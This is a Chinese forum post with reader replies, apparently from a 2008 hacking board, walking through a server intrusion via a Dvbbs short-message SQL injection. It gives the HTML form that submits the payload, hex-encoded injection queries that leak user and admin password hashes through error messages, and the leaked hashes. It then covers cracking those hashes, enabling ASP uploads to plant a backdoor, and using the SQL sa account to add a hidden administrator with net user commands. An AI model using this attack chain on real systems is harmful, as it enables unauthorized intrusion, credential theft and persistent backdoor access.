利用dvbbs短消息漏洞入侵服务器
利用dvbbs短消息漏洞入侵服务器第一步:用注册好的用户名登陆,登陆时选择保存cookie,撰写短消息,保存
第二步:利用下边网页提交信息
<form action=http://xxxx/bbs/messanger.asp?action=删除草稿 method=post>
<input type=text name=id width=32>
<input type=submit>
</form>
username使用SQL Encoder编码,这里我们用一个管理员的名字radiofly
提交
select userpassword from [user] where username=0x72006100640069006f0066006c007900 and userpassword>7
得到
Microsoft VBScript 编译器错误 错误 '800a03f6'
缺少 'End'
/iisHelp/common/500-100.asp,行242
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
将 nvarchar 值 '78e4ea2181b00d21' 转换为数据类型为 int 的列时发生语法错误。
/bbs/messanger.asp,行619
78e4ea2181b00d21就是radiofly的前台密码
提交
select password from admin where username=0x72006100640069006f0066006c007900 and password>7
得到后台密码 acaa91f51ed197c7
用dvbbs密码猜解工具猜解密码 等待 等待 再等待。。。。。。ok
得到密码后登陆进入后台,修改文件上传类型,添加asp类型,上传asp后门
得到sql数据库的sa密码,使用sqlexec连接
net user admin$ xiaoxue /add
net localgroup administrators admin$ /add
[[i] 本帖最后由 零点十分 于 2008-9-24 17:02 编辑 [/i]] 我也了学习一下了!~ 我来充电,确实不错 没有看懂
:L
页:
[1]